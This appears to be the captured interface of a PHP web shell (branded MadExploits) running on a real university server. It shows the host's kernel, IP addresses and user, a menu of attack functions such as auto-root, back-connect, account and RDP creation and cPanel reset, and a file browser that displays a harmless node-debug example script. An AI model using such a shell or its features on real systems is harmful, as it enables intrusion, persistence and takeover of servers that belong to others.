Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 3.145.66.195
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
appadmin
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
node-debug /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
app.js
383
B
-rw-r--r--
colors.js
169
B
-rw-r--r--
stdout.js
554
B
-rw-r--r--
wildcards.js
182
B
-rw-r--r--
worker.js
489
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : stdout.js
const debug = require('../..'); const error = debug('app:error'); // By default stderr is used error('goes to stderr!'); const log = debug('app:log'); // Set this namespace to log via console.log log.log = console.log.bind(console); // Don't forget to bind to console! log('goes to stdout'); error('still goes to stderr!'); // Set all output to go via console.info // overrides all per-namespace log settings debug.log = console.info.bind(console); error('now goes to stdout via console.info'); log('still goes to stdout, but via console.info now');
Close